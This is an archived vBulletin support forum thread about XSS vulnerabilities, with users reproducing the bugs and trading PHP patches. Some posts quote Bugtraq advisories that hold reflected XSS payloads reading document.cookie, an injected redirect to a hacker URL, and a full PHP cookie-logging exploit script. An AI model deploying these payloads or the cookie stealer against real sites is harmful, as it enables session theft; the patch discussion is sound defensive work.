viewed via bugtraq...


.:: vBulletin XSS Security Bug

vBulletin is a powerful and widely used bulletin board system, based on
PHP language and MySQL database. One of its features is the usage of
templates to modify the boards look. I discovered lately a Cross-Site
Scripting vulnerability that would attackers to inject maleficent codes
and execute it on the clients browser.

+ Vulnerable Versions:

- Jelsoft vBulletin 2.2.8.
- Jelsoft vBulletin 2.2.7.
- Jelsoft vBulletin 2.2.6.
- Jelsoft vBulletin 2.2.5.
- Jelsoft vBulletin 2.2.4.
- Jelsoft vBulletin 2.2.3.
- Jelsoft vBulletin 2.2.2.
- Jelsoft vBulletin 2.2.1.
- Jelsoft vBulletin 2.2.0.
- Jelsoft vBulletin 2.0.2.
- Jelsoft vBulletin 2.0.1.
- Jelsoft vBulletin 2.0.0.
- Jelsoft vBulletin 2.0.0 Candidate 3.
- Jelsoft vBulletin 2.0.0 Candidate 2.
- Jelsoft vBulletin 2.0.0 Candidate 1.
- Jelsoft vBulletin 2.0.0 Beta 5.
- Jelsoft vBulletin 2.0.0 Beta 4.
- Jelsoft vBulletin 2.0.0 Beta 4.1.
- Jelsoft vBulletin 2.0.0 Beta 3.
- Jelsoft vBulletin 2.0.0 Beta 2.
- Jelsoft vBulletin 2.0.0 Beta 1.
- Jelsoft vBulletin 2.0.0 Alpha.

+ Details:

In global.php there is a variable [$scriptpath], the value of it is the
referred URL that the client came from. Move on to admin/functions.php,
in show_nopermission function the $scriptpath is called as a global
variable. The content of the variable gets printed in the
error_nopermission_loggedin template without filtering it. So if we pass
some tags and script codes in the URL and refresh the page it will be
printed in the no permission template. The same thing with $url variable
which print its contents in many templates.

+ Exploit:

Note: Tested on Microsoft Internet Explorer 6.0 and vBulletin.com:

- Go to usercp.php?s=[Session ID]"><Script>alert
(document.cookie);</Script> [You can use it wherever
error_nopermission_loggedin get printed].
- A pop-up window will appear and you'll receive an error message.
- Then log in.
- Go back to the previous pages where you left the login form.
- Then the pop-up window will appear again containing the User ID and
Password Hash.

The same thing with $url templates.

+ Solution:

- Forum administrator can add some codes that will check the referred
URL and filter its inputs or upgrade to vBulletin 3.0.

+ Links:

- Http://www.vBulletin.com

now i have to admit that i have not tried it (yet). but i would be interested in comments from the development team (who knows the codebase best)...

I tried it on my unhacked test forum and it didn't work.

Originally posted by Steve Machol
I tried it on my unhacked test forum and it didn't work. i'm assuming that is v2.2.8? that is a good thing to hear.

Yep, it was 2.2.8.

One clue that this report isn't all that valid is its suggestion to upgrade to vB3.

Originally posted by bigmattyh
One clue that this report isn't all that valid is its suggestion to upgrade to vB3. i saw that... :rolleyes:

I'm not using 2.2.8, so I can't confirm if it's vulnerable or not, but if you want to be on the safe side, apply this one line fix:

Open admin/functions.php, look for:function show_nopermission() {
global $bbtitle,$logincode,$url,$scriptpath,$bbuserinfo,$ session;After it, add: $scriptpath = str_replace("\"", "", $scriptpath);

I just tested this, and it does work...

Tommy Boy: htmlentities() would be better...

Originally posted by MUG
I just tested this, and it does work...

Tommy Boy: urlencode() would be better...
vB version? :confused:

Originally posted by nuno
vB version? :confused: 2.2.8.

Remember: you have to be logged out in order for the example posted to work.

(and &lt; should be replaced by <, &gt; replaced by >)

It sounds like it only returns your password hash :confused:

Originally posted by MUG
Tommy Boy: urlencode() would be better...
Actually, both work, and even htmlspecialchars and htmlentities will work, but str_replace is the most efficient option. If you insist on being "logically" correct, you can use the following fix, but there is no reason for a vBulletin URL to include quotes in the first place, unless altered by a user...
$scriptpath = str_replace("\"", "%22", $scriptpath);BTW: This only solves the $scriptpath templates, I'll leave the $url templates to the vb developers to fix. ;)

Originally posted by filburt1
It sounds like it only returns your password hash :confused:

Correct
but what if someone makes the code visit some.other.domain/some.script.php?action=storeCookie&cookie=your cookie here? ;)

Ooh, that would be super major baddy bad :o

BTW I was able to get this to work on my forums. You have to replace the escaped characters with their equivalent actual chars (i.e., gt to >).

BTW Tommy Boy's fix worked on my board; I can't track down how to fix $url problems.

dang it :eek:
2.2.9 just around the corner i guess :rolleyes:

Originally posted by MUG
2.2.8.

Remember: you have to be logged out in order for the example posted to work.

(and &lt; should be replaced by <, &gt; replaced by >) Hmmm...it still doesn't work for me (using IE 6). I was logged out, I put my test domain into the 'trusted' zone' and I even disabled by personal firewall. Nothing happens.

I got it to work by:

1. Logging out
2. Copying the URL into Notepad: usercp.php?s=[Session ID]"><Script>alert
(document.cookie)</Script>
3. Replacing sessionid as appropriate
4. Copying the final URL and opening it in IE

And I get the nopermission screen but a Javascript popup showing the cookie values as well.

Edit: I have NAV and ZoneAlarm on and it still does this...at least until I applied Tommy Boy's fix.

1. Log Out
2.

http://www.vbulletin.com/forum/usercp.php?s="><Script>alert(document.cookie);</Script>

3. Login
4. Hit Back Twice

The fix worked on my board as well. Thanks. :)

Holy wow--how did I miss this thread? :) Next time I'll wear my glasses before posting. Thanks TommyBoy for pointing it out to me.

And where's the security leak? Right now it just displays the contents of my local cookie, not more.

You can change it to embed code to send the cookies to another server (hence XSS) and store them remotely, thereby slowly collecting a list of userids and passhashes.

Well, OK, you're right.

Well I'd prefer the following fix:
---------==={OPEN THE FILE}===---------

forum/global.php

--------------==={FIND}===-------------

// get useful vars
$ipaddress=$REMOTE_ADDR;
$scriptpath=$REQUEST_URI;
if ($scriptpath=='') {
if ($PATH_INFO) {
$scriptpath = $PATH_INFO;
} else {
$scriptpath = $PHP_SELF;
}

if ($QUERY_STRING) {
$scriptpath .= '?'.addslashes($QUERY_STRING);
}
}

--------==={AFTER THAT, ADD}===--------

$scriptpath = htmlspecialchars($scriptpath);

--------------==={FIND}===-------------

$url = str_replace('$','',addslashes($url));

--------==={REPLACE IT WITH}===--------

$url = htmlspecialchars(str_replace('$','',addslashes($ur l)));I think, that would fix it, but I can't try it out right now. Could someone test it for me, please?

I've managed to test it now and it seems to work. Could a Dev check, if it is a valid fix for this, please?

I'm edging for a global XSS issue fix by removing all document.cookie from the output, though this will cause problems with people who post in forums its better to be safe than sorry.

functions.php

look for

if ($newpmmsg) {
if (substr($PHP_SELF,-strlen('private.php'))=='private.php') {
} else {
$newtext=preg_replace("/<body/i","<body onload=\"Javascript:confirm_newpm()\"",$newtext);
}
}

below it add

$newtext = preg_replace('/document.cookie/si', 'document_cookie', $newtext);

I'll still have to discuss it with some of the other devs but if for some reason we dont use it then it will be what Stadler posted.

Originally posted by PPN
I'm edging for a global XSS issue fix by removing all document.cookie from the output, though this will cause problems with people who post in forums its better to be safe than sorry.


Well, now I'm curious ;)

What sort of problems will this cause with posting in forums? I'm trying to decide which fix to implement but would prefer not causing additional problems for users. :)

Thanks,
Paul

we went for the htmlspecialchars solution as you could potentially use eval("docum"+"ent.cooke"); to get round it.

Thanks Scott :)

Originally posted by PPN
we went for the htmlspecialchars solution as you could potentially use eval("docum"+"ent.cooke"); to get round it.

so use Stadler's fix?

Yup :)

Originally posted by nuno
Yup :)

yup to Stadler's fix? :) Just makin sure ....

is that the final fix or should we wait until this thread gets the [fixed] label?

[fixed] is appended to the subject once the fix is applied in CVS, I believe. It doesn't mean that the developers will use the code supplied here, per se.

Stadler's fix removes the possibility of embedding special html characters and therefore prevents <script></script> from being used altogether. PPN's fix relies on the string "document.cookie", which as he pointed out, can be broken up with + signs.

Hope this helps,
Paul

What happened to the general rule in computing that if you find a security bug, you report it to the software maker and if no action is taken within a few weeks they tell everyone about it so that script kiddies don't get to play around with it?

open global.php
look for

if ($QUERY_STRING) {
$scriptpath .= '?'.addslashes($QUERY_STRING);
}
}

below it add

$scriptpath = htmlspecialchars(str_replace('javascript', 'java script', $scriptpath));

look for

$url=$HTTP_SERVER_VARS['HTTP_REFERER'];

replace it with

$url = htmlspecialchars(str_replace('javascript', 'java script', $HTTP_SERVER_VARS['HTTP_REFERER']));

look for

$HTTP_POST_VARS['action'] = trim($HTTP_POST_VARS['action']);

below it add

$HTTP_GET_VARS['goto'] = htmlspecialchars(str_replace('javascript', 'java script', $HTTP_GET_VARS['goto']));

Applied PPN's fix to our forums. Works like a charm. :)

only the changes from PPN fixed the bug? Must i only make the changes from PPN at the funktions.php and global.php? The fix from Tommy Boy i dont make or?

You don't need to modifiy functions.php, simply apply PPN's Fix in his last message here to global.php. Thats all.

Originally posted by PPN
open global.php
look for... which one?

Forum folder global.php, not admin.

Originally posted by DWZ
which one? forum/global.php ;)

[Edit:]D'Oh. One minute too slow :o

Is that the official fix?

Satan

It's a fix from one of the vB Dev Team members, that's more than enough for me. :o

It appears to work without errors, so thats good enough for me!!!:D

Satan

thats the fix I commited to cvs and that will be in the next release.

That means, there will be a vBulletin 2.2.9, right? :o

What about hex-variables e.g.



http://www.vbulletin.com/forum/usercp.php?s=%22%3e%3c%53%63%72%69%70%74%3e%61%6c% 65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b %69%65%29%3b%3c%2f%53%63%72%69%70%74%3e

Try it, this forum is now running the fix. It should not affect it.

Am i right in assuming the updated global.php posted by John in "Announcements" uses a slight variation of PPN's fix.

So should we upload the new global.php,or will PPN's fix work the same?

What's the point of having this?
str_replace('javascript', 'java script', $scriptpath)
As far as I see it, using htmlspecialchars should be enough, but even if it's not, this replace is worthless, as it's case sensitive...

It appears that John's global.php fix is cleaner than PPN's;)

Satan

Originally posted by Tommy Boy
What's the point of having this?
str_replace('javascript', 'java script', $scriptpath)
As far as I see it, using htmlspecialchars should be enough, but even if it's not, this replace is worthless, as it's case sensitive... Well, I agree with it. Using the "str_replace('javascript', 'java script', "-Part wouldn't make any difference. At least they should use eregi_replace instead.

it looks like john tidied it up a little :)

Running 2.2.6 here, will John's global.php be ok to use with that version or do you suggest I edit my current file? Thanks.

No. You'd need to upgrade to 2.2.8 to use that file.

Ok, so do the edit's provided by PPN work on 2.2.6? as this version is vulnerable to the exploit too. I am looking for a security fix here, not a full forum upgrade!

Centris,

You would need to look at the code to see if it fits in. In all honesty, there have been a lot of code fixes since 2.2.6--I'd recommend waiting for 2.2.9 and to do a full upgrade to that.

If you have hacks installed, try a program like Araxis Merge or Beyond Compare to retain the changes you've made.

Paul

Originally posted by Tommy Boy
What's the point of having this?
str_replace('javascript', 'java script', $scriptpath)
As far as I see it, using htmlspecialchars should be enough, but even if it's not, this replace is worthless, as it's case sensitive...

Good point. At least use strtolower().

preg_replace is preferrable to ereg(i)_replace.

OK, the only edit that is not in the 2.2.6 script is;

$url=$HTTP_SERVER_VARS['HTTP_REFERER'];

Can this simply be left out, comments would be appreciated.

preg_replace frightens me ;)

In the meantime, I've made the following change (in all cases where the javascript replace is being done):

str_replace('javascript', 'java script', strtolower($scriptpath)));

It looks like the suggested fix breaks redirects after logging in:

http://www.vbulletin.com/forum/showthread.php?s=&threadid=57228

Edit: I've confirmed this problem on my forum as well. Any time a user logs in on a nopermission screen, this arises. Removing the htmlspecialchars() calls in the global.php "fix" resolves the issue. Would it be considered safe to only alter the javascript string? Is it possible that the addition of something like a hex backspace code could undo the space? Perhaps any occurances of javascript should simply be removed? (i.e. str_replace('javascript','',strtolower($string)?)

I've applied PPN's Fix here (http://www.vbulletin.com/forum/showthread.php?postid=362889&action=showpost) on our Forums and the problem with amp; doesn't appear.

But I've just tried the global.php john posted and amp; appeared.

So I'd prefer applying PPN's fix.

yep its doing htmlspecialchars twice.
try this global.php

Scott,

I'll upload this in a bit and try it out. I did notice that the xss_clean function only checks for "javascript" (not JAVASCRIPT or jAvAsCrIpT, etc.) Do you think you could incorporate the suggestion made previously with preg_replace or strtolower? I suppose that one could argue that with the < and > being replaced, that it doesn't matter, but then why check for 'javascript' at all?

Thanks :)
Paul

javascript:alert(document.cookie);

thats why :)

i'll use a regexp then

try this, i would convert all the replacements to a regexp but str_replace is faster

Originally posted by PPN
try this, i would convert all the replacements to a regexp but str_replace is faster

It seems to work--when attempting the exploit, it adds two slashes to the end of usercp.php which causes all the images to not load properly, but other than that--no popup ;) Serves them right not getting the images whilst trying to exploit the forum ;)

Thanks again Scott! :D

doesn't add two slashes for me on my dev board.

What fix is now the offiziell? The fix from John or PPN?

the global.php file i attached, i'll get john to update his announcement when he is online.

Thanks PPN. Works fine. :)

I like PPN's new fix.

BTW: This global.php should also work on 2.2.6 (it does on mine).

Whats the deal here? Running 2.2.7 What specifically do I need to do with global.php?

Originally posted by Smoothie
Whats the deal here? Running 2.2.7 What specifically do I need to do with global.php?

PPN's attached fix modifies the code to prevent against a publically released cross-site scripting vulnerability that exists in 2.2.8 and below. It's designed with 2.2.8 in mind and is a replacement for your existing <forum directory>/global.php (NOT global.php in /admin)

TommyBoy reported success using this global.php with his 2.2.6 forums, so I'd assume you'd be safe using this with 2.2.7. You might want to seriously considering upgrading though--there have been a number of fixes inbetween 2.2.7 and 2.2.8.

Use a program like Araxis Merge or Beyond Compare to see what's changed between your global.php and this new one.

Paul

I'd rather know what to find and replace in global.php rather then uploading a new file.

Originally posted by Smoothie
I'd rather know what to find and replace in global.php rather then uploading a new file.

Which is where the programs I mentioned in my last post come in. :rolleyes:

Originally posted by Smoothie
I'd rather know what to find and replace in global.php rather then uploading a new file.


Find:

unset($vars);

Bellow Add:


function xss_clean ($var) {
$var = preg_replace( '/javascript/i', 'java script', $var );
$var = str_replace( '"', '&quot;', $var );
$var = str_replace( '<', '&lt;', $var );
return str_replace( '>', '&gt;', $var );
}



Find:

$scriptpath=$REQUEST_URI;

Replace with:

$scriptpath = xss_clean( $REQUEST_URI );

Find:

$scriptpath .= '?'.addslashes($QUERY_STRING);

Replace with:

$scriptpath .= '?'.addslashes( xss_clean( $QUERY_STRING ) );

Find:

$url = str_replace('$','',addslashes($url));

Replace with:

$url = str_replace( '$', '', addslashes( xss_clean( $url ) ) );

Find:

$HTTP_POST_VARS['action'] = trim($HTTP_POST_VARS['action']);

Bellow add:


if ( isset( $goto ) ) {
$goto = xss_clean( $goto );
}



Those are the differnces between the 2.2.8 /global.php and the posted /global.php


Already been though and upgraded serveral vB's with the same fix today...

@The Prohacker-

Is that the same for (2.2.7) global.php, which is what I'm running?

Originally posted by LoveShack
Which is where the programs I mentioned in my last post come in. :rolleyes: Those proggies don't run on a Mac, last time I checked. :(

Originally posted by Smoothie
Those proggies don't run on a Mac, last time I checked. :(
You should consider getting "Virtual PC". We have macs at my job and we use it to be able to work on Ms Access.

http://www.connectix.com/products/vpc5m.html

What is Jelsofts official position regarding security with the various versions of vbulletin? We have here a very public exploit, several fixes, one seems to break summit else and a very confused user with an owner licence. My 2.2.6 scipts are dated 26 July 2002, 14:46:12, say 12 weeks old so I hardly view my version of vbulletin OLD and out of date, I am not in a position to update at this time either, so that is not an option.

the fix that has been used in cvs and now in john's announcement is that of which The Prohacker has posted the differences for.

The question still not answered. Will this fix work with older versions? 2.2.7?

Originally posted by Smoothie
The question still not answered. Will this fix work with older versions? 2.2.7? Originally posted by Tommy Boy
I like PPN's new fix.

BTW: This global.php should also work on 2.2.6 (it does on mine). This means, yes ^^

Well, if your version is older than that, you could try to apply, what The Prohacker has posted. But I for myself prefer to upgrade to 2.2.9, though it's some work to reapply all the hacks again.

so what doe sthis allow?

You dont need to do that...

Just download Araxis Merge or Beyond Compare (I used BC)...

I have loads of hacks installed on my site (http://www.darkblazes.com/)

I updated manually from 2.2.6 to 2.2.8 a few weeks ago, and I encountered no problems!:)

Satan

Do i replace all global.php files with the new one ?

<-- newbie to it all here.

http://www.vbulletin.com/forum/showthread.php?s=&threadid=57203
only forum/global.php ;)

Thanks for the rescue nuno :)

Newbie question...

I downloaded the fixed global.php file, and its size on my computer is 11,266. I uploaded it to my board, and its size there is 10,894. Why would it be a different size? Did I do something wrong? Thanks.

It should be the same size. Make sure you download and upload in ASCII, and that you overwrite the one on the server.

i find that the sizes dont equal what it says on my disk, but only in some FTP clients. Main difference is WSFTP and Cute FTP.

I think (taking a guess here) it's because the server you are uploading the file to is probably UNIX and you are using windows. They have a slightly different way of sorting files (such as line breaks). I'm probably being misled though! :p

Originally posted by Steve Machol
It should be the same size. Make sure you download and upload in ASCII, and that you overwrite the one on the server.
After I downloaded the global.php file, I was able to open it in MS Notepad, and it looks okay... not gibberish. So, I downloaded it in ASCII, not binary. Right?

And I'm positive that I uploaded in ASCII. Just to be absolutely sure, I set the transfer mode to ASCII only... and then uploaded the global.php file. The file sizes still don't match.



Originally posted by PPN
i find that the sizes dont equal what it says on my disk, but only in some FTP clients. Main difference is WSFTP and Cute FTP.
All the other php files, which I downloaded in the 2.2.8 upgrade zip file and then uploaded to the server, match sizes exactly. That is, they are the same size on my computer as on the server. Only the global.php file that I downloaded, as the XSS bug fix, doesn't match. I use SSH Secure Shell FTP, from ssh.com, instead of WS_FTP or Cute FTP.



Originally posted by Babylon
I think (taking a guess here) it's because the server you are uploading the file to is probably UNIX and you are using windows. They have a slightly different way of sorting files (such as line breaks). I'm probably being misled though! :p
Yes, it's a UNIX server, not Windows. But, if this was the cause, I would think it would affect all the php files, not just the global.php file.



Thanks all for jumping in here, to try to troubleshoot this. I'm definitely concerned that maybe something's not right. Any other thoughts on why the file sizes don't match just for the global.php file?

My guess would be that when the global.php file was edited, it was done with windows carriage returns. Uploading it in ASCII probably removes the extra gibberish. ;)

Originally posted by mishkan
After I downloaded the global.php file, I was able to open it in MS Notepad, and it looks okay... not gibberish. So, I downloaded it in ASCII, not binary. Right? Yep, thats right.

Try downloading Araxis Merge (http://www.araxis.com/merge/) (there is a 30 trial shareware download).

In one window open up the global.php you got from vBulletin, and in the other window open up the global.php you got from your website and see if there are any differences.

Originally posted by mishkan
Thanks all for jumping in here, to try to troubleshoot this. I'm definitely concerned that maybe something's not right. Any other thoughts on why the file sizes don't match just for the global.php file?

When I use WSFTP, the file sizes correlate and remain the same. When I use ACEFTP, the file sizes are different (after I upload it. When I download it, it reverts back to the "normal" size). I'm sure there's a simple explanation for this, but either way, the file works. :) I agree with what Loveshack says about carriage returns (though the reversion back to normal when I download makes no sense).

LoveShack, that's interesting to know, about Windows putting in special carriage returns.

DWZ, I have Beyond Compare, so I tried what you suggested. I downloaded the global.php file that I had uploaded, before. Then I compared both files. They are exactly alike!

And, Erwin, when I downloaded the global.php file, in order to compare it to the original, it did revert back to the same file size as the original, just like it did for you!

What is so confusing, is that only the global.php file doesn't match the file size on my computer. I just upgraded to 2.2.8, yesterday, and all the other php files match.

You're probably right that there's some simple explanation for this! Before I let this go, how can I test this global.php file, to see if it's working correctly? Thanks again, everyone.

Does anyone know a way I can test my global.php file, to make sure it's working correctly? Simple, sequential steps, please. ;) Thanks in advance.

Originally posted by mishkan
Does anyone know a way I can test my global.php file, to make sure it's working correctly? Simple, sequential steps, please. ;) Thanks in advance. AFAIK the only way to test it is to run through all the various options on your forums. If you don't get any errors related to global.php then you're probably okay.

Steve, thanks. :) What I meant to ask was... how do I test the global.php file, to make sure it's working against this XSS security bug?

In the beginning of this thread, some people were talking about reproducing the security problem on their own boards. It became confusing for me, as some people were successful, some were not, and some were changing the steps this way or that way.

I too would like to test my global.php file and make sure my board is secure. Remember, I have some uncertainty as to whether or not I uploaded correctly, as the file sizes don't match. :(

Would you, or some other generous soul, please sift through this thread and type up the correct steps to reproduce the security bug? Many thanks if you have the time. :)

Originally posted by mishkan
Steve, thanks. :) What I meant to ask was... how do I test the global.php file, to make sure it's working against this XSS security bug? The info was in the first two pages or so.

If you like, PM me your URL and a test (just normal member) account and I'll test the site against the bug for you.

I was attacked by such a script.

I am running 2.2.9 and i got mail from vB:


Database error in vBulletin 2.2.9:
Invalid SQL: SELECT thread.threadid
FROM thread,subscribethread
WHERE subscribethread.threadid=thread.threadid
AND subscribethread.userid='29'
AND thread.visible=1 AND lastpost >= 1035446435
ORDER BY lastpost DESC
LIMIT 0,<Script>location='http://<hackerurl>/x.php?Action=Log

mysql error: You have an error in your SQL syntax near '<Script>location='http://<hackerurl>/x.php?Action=Log
' at line 7

mysql error number: 1064



Is this good or bad?
Sorry, i am a little bit scary, so please give me a feedback.

Thank you!

that was another unpublished one that has been fixed in the latest cvs version.

Does that mean someone has created an exploit that's in the wild for this unpublished problem? If so, perhaps the fix should be shared here.

Originally posted by LoveShack
Does that mean someone has created an exploit that's in the wild for this unpublished problem? If so, perhaps the fix should be shared here.

I spoke too soon. I opened up my e-mail client and saw the post on Bugtraq.

I've posted a quick solution in this thread: http://www.vbulletin.com/forum/showthread.php?postid=375329

So, what does this thing do?

Does the "hacker" received Data from my System (So i have to change important Passwords" or happend nothing.

System works fine, i only got the error one time.

Running 2.2.9 RC

Originally posted by TheSonic
So, what does this thing do?

Does the "hacker" received Data from my System (So i have to change important Passwords" or happend nothing.

System works fine, i only got the error one time.

Running 2.2.9 RC There are two known exploits.

One allows someone to use the XSS exploit to steal cookies, and potentially log in as that user.

The other is an SQL injection exploit.

I would patch them both up until the new final version is released.

Originally posted by Raz Meister
There are two known exploits.

One allows someone to use the XSS exploit to steal cookies, and potentially log in as that user.

The other is an SQL injection exploit.

I would patch them both up until the new final version is released. Cool...

I really do hope this is the last time we see this error;)

Satan

Originally posted by hellsatan
Cool...

I really do hope this is the last time we see this error;)

Satan guys, on bugtraq vbulletin reportd hole again?
http://marc.theaimsgroup.com/?l=bugtraq&amp;m=103802065718628&amp;w=2

i disable memberlist till vbulletin developer confirm about this

Originally posted by bejita_kg
guys, on bugtraq vbulletin reportd hole again?
http://marc.theaimsgroup.com/?l=bugtraq&amp;m=103802065718628&amp;w=2

i disable memberlist till vbulletin developer confirm about this That is the original XSS vunerabilty reported. Not a new one.

Originally posted by Raz Meister
That is the original XSS vunerabilty reported. Not a new one.

Actually that is a new bug, I've just tested it on my 2.2.9 RC install and I get the popup with the details

Originally posted by NTLDR
Actually that is a new bug, I've just tested it on my 2.2.9 RC install and I get the popup with the details What I meant was that its already been reported and a fix has been posted.

Its not new as in its the 3rd bug.

Originally posted by Raz Meister
What I meant was that its already been reported and a fix has been posted.

Its not new as in its the 3rd bug.

Sorry, I miss-understood, It works on vB.org so I suggest that it is fixed there.

It seems to only affect sites with more than one page in the members list, so a fresh installation will probably come out clean. However, I'm not saying this after looking at the code, so it's only my impression and should be verified.

Originally posted by Tommy Boy
It seems to only affect sites with more than one page

That does seem logical and the case from what I have found out. I saw the link above to the thread where this has been mentioned and will try the patches there :)

yes it only happens on links with more than one page as that is the only time that it is shown on the page.

These and more will be fixed for 2.2.9 Final.

Originally posted by Scott MacVicar
yes it only happens on links with more than one page as that is the only time that it is shown on the page.

These and more will be fixed for 2.2.9 Final. so for now disabling anyone to access memberlists is the best solution? when the final version out?

Originally posted by bejita_kg
so for now disabling anyone to access memberlists is the best solution? when the final version out? No. Applying the suggested fixes would be the best solution. The developers are looking at all of the vBulletin code and there may be other places where a vulnerability could occur in other files--not just memberlist.php or member2.php. The only ones known publically are the ones that have been reported here. Anything else just an additional precaution.

2.2.9 Final, like 3.0 will be released when it's ready. Hopefully not a moment before. :)

Best wishes,
Paul

Originally posted by LoveShack
No. Applying the suggested fixes would be the best solution. The developers are looking at all of the vBulletin code and there may be other places where a vulnerability could occur in other files--not just memberlist.php or member2.php. The only ones known publically are the ones that have been reported here. Anything else just an additional precaution.

2.2.9 Final, like 3.0 will be released when it's ready. Hopefully not a moment before. :)

Best wishes,
Paul ok, thanks :D
i also try and error on my own forum, i'll report it if found other bug

Originally posted by LoveShack
2.2.9 Final, like 3.0 will be released when it's ready. Hopefully not a moment before. :)


I dont like to hack my board and so i hope, Jelsoft release a fix very soon.

I most cases it's ok, if they first test the versions for a while (or a long time :D ) (thats why vB is such a great stable product, i think.)

But now, the situation is another, because there are KNOWN *BIG* problems, so i would like to see an official release from Jelsoft - even if it is just a Hotfix - to close the holes.

And a new XSS bug
Mail per bugtraq
.:: vBulletin XSS Injection Vulnerability

vBulletin is a powerful and widely used bulletin board system, based on
PHP language and MySQL database. I discovered lately a Cross-Site
Scripting issue that would allow attackers to inject maleficent codes
into the pages and execute it on the clients browser.

+ Vulnerable Versions:

- Jelsoft vBulletin 2.2.9 Candidate.
- Jelsoft vBulletin 2.2.8.
- Jelsoft vBulletin 2.2.7.
- Jelsoft vBulletin 2.2.6.
- Jelsoft vBulletin 2.2.5.
- Jelsoft vBulletin 2.2.4.
- Jelsoft vBulletin 2.2.3.
- Jelsoft vBulletin 2.2.2.
- Jelsoft vBulletin 2.2.1.
- Jelsoft vBulletin 2.2.0.
- Jelsoft vBulletin 2.0.2.
- Jelsoft vBulletin 2.0.1.
- Jelsoft vBulletin 2.0.0.

+ Details:

At "Start View Threads" block in member2.php, there is a variable
[$perpage] controls the way of reciting subscribed threads, therefore an
integer value [Which refers to the number of threads that will be
displayed each page] should be assigned for the variable. However, we
should realise that the value of this variable is added to a query that
will fetch records from the database, so if a client gave a wrong value
to $perpage, the script will output an error message [Due to script
doesn't checks on inputs and filter it], printing the query and revealing
its mistake.

+ Exploit:

- Run this script on some host:

<?PHP

// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's cookies and storing it into a
log file.

// Variables:

$LogFile = "Cookies.Log";

// Functions:

/*

If ($HTTP_GET_VARS['Action'] = "Log") {

$Header = "<!--";
$Footer = "--->";

}
Else {

$Header = "";
$Footer = "";

}

Print ($Header);

*/

Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");

/*

Print ($Footer);

*/

Switch ($HTTP_GET_VARS['Action']) {

Case "Log":

$Data = $HTTP_GET_VARS['Cookie'];

$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));

$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);

Print ("<Meta HTTP-Equiv=\"Refresh\"
Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");

Break;

Case "List":

If (!File_Exists ($LogFile) || !In_Array ($Records)) {

Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");

Exit ();

}
Else {

Print ("</Center></Pre>");

$Records = Array_UniQue (File ($LogFile));

Print ("<Pre>");

Print ("<B>.:: Statics</B>\n");
Print ("\n");

Print (". Logged Records : <B>" . Count (File
($LogFile)) . "</B>\n");
Print (". Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");

Print ("<B>.:: Options</B>\n");
Print ("\n");

If (Count (File ($LogFile)) > 0) {

$Link['Download'] = "[<A Href=\"" .
$LogFile . "\">Download</A>]";

}
Else{

$Link['Download'] = "[No Records in Log]";

}

Print (". Download Log : " . $Link
['Download'] . "\n");
Print (". Clear Records : [<A Href=\"" .
$SCRIPT_PATH . "?Action=Delete\">Y</A>]\n");
Print ("\n");

Print ("<B>.:: Records</B>\n");
Print ("\n");

While (List ($Line[0], $Line[1]) = Each ($Records)) {

Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);

}

}

Print ("</Pre>");

Break;

Case "Delete":

@UnLink ($LogFile);

Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");

Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");

Break;

}

?>

- Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]

- Note: You can replace [Script Code] with: --
>&lt;Script&gt;location='Http://[Exploit Path]?Action=Log&Cookie='+
(document.cookie);&lt;/Script&gt;

- Then go to Http://[Exploit Path]?Action=List

+ Solution:

- Under [ // set defaults ] on line 304, paste this code:

If (IsSet ($perpage) && $perpage != Is_Int($perpage)) {

$perpage = IntVal ($perpage);

}

+ Links:

- Http://www.vBulletin.com

augh, not another idiot deciding it would be a good idea to inform all the script kiddies how to **** with our forum...

What's the URL to that report? I want to send the guy an email...

Originally posted by DaTeX
And a new XSS bug
Mail per bugtraq we have been aware of this problem for many days, version 2.2.9 has been released and it has fixed about 4 XSS bugs.

Originally posted by Scott MacVicar
we have been aware of this problem for many days, version 2.2.9 has been released and it has fixed about 4 XSS bugs. I can only find Release Canidate at the Member Area.

Originally posted by Hellburn
I can only find Release Canidate at the Member Area. The Full Release has been released;)

Satan

Could someone please post a step by step patch to fix all of the files that are fixed in the full release for those of us who prefer not to upgrade or overwrite entire files?

Thanks.

{edit} Nevermind. I went through the 2.2.9 files and applied the patches to 2.2.8 myself.